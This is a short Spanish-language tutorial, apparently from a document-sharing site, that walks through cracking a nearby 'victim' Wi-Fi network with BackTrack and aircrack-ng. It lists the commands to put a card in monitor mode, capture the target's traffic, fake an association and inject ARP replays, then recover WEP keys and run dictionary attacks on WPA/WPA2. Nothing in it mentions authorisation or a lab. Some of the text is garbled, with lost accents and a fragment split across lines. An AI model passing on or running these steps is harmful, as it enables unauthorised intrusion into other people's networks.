Está en la página 1de 1

Primero iniciar desde DVD o USB. Despus introducimos el siguiente comando: startx, para poder ingresar al Back Track.

1. Abrimos una consola y escribimos estos cdigos:

Ifconfig (para detectar tu tarjeta de red externa). Iwconfig airmon-ng (para ver la o las interfaces que tenemos, con esto podemos elegir cual vamos a utilizar (wlan0 o wlan1), en caso de tener dos tarjetas). Ifconfig wlan0 up o Ifconfig wlan1 up (cual sea el caso). airmon-ng start wlan0 o wlan1 (cual sea el caso). airmon-ng start mon0 o mon1 (checar en el paso anterior cual interfaz mon0 o mon1 est en modo enabled). airodump-ng mon0 o mon1 (para escanear las redes cercanas, apuntar el BSSID y el Canal de la red). Crl + c para detener el escaneo. airodump-ng -w victima (nombre del archivo donde se van a guardar las claves) -c Chanel (No. De canal de la vctima) --bssid 00:00:00:00:00:00 (mac de la vctima) mon0 o mon1 (segn sea el caso).
2. Abrimos una nueva consola para poner el siguiente cdigo para realizar la asociacin falsa.

aireplay-ng -1 0 -a 00:00:00:00:00:00 (mac de la vctima) mon0 o mon1 (segn sea el caso). Esperar a que aparesca: association succeful : - )
3. Abrimos otra consola para escribir el siguiente cdigo para empezar a capturar datos.

aireplay-ng -3 -b 00:00:00:00:00:00 (mac de la vctima) mon0 o mon1 (segn sea el caso). Fijarse en la primer consola y Capturar 3000 #Data. aireplay-ng --arpreplay -b 00:00:00:00:00:0 (mac de la vctima) mon0 o mon1 (segn sea el caso).
4. Abrimos otra consola para empezar a buscar la clave con el siguiente cdigo:

aircrack-ng victima claves*.cap *

(nombre

del

archivo

donde

guardamos

las

aircrack-ng -b 00:00:00:00:00:00 (mac de la vctima) victima*.cap Para WAP y WAP2 aircrack-ng -w password.lst -b 00:00:00:00:00:00 (mac de la vctima) victima*.cap aircrack-ng -w dictionary_spanish.dic -o victima*.cap aircrack-ng -a 1 -s victima*.cap

También podría gustarte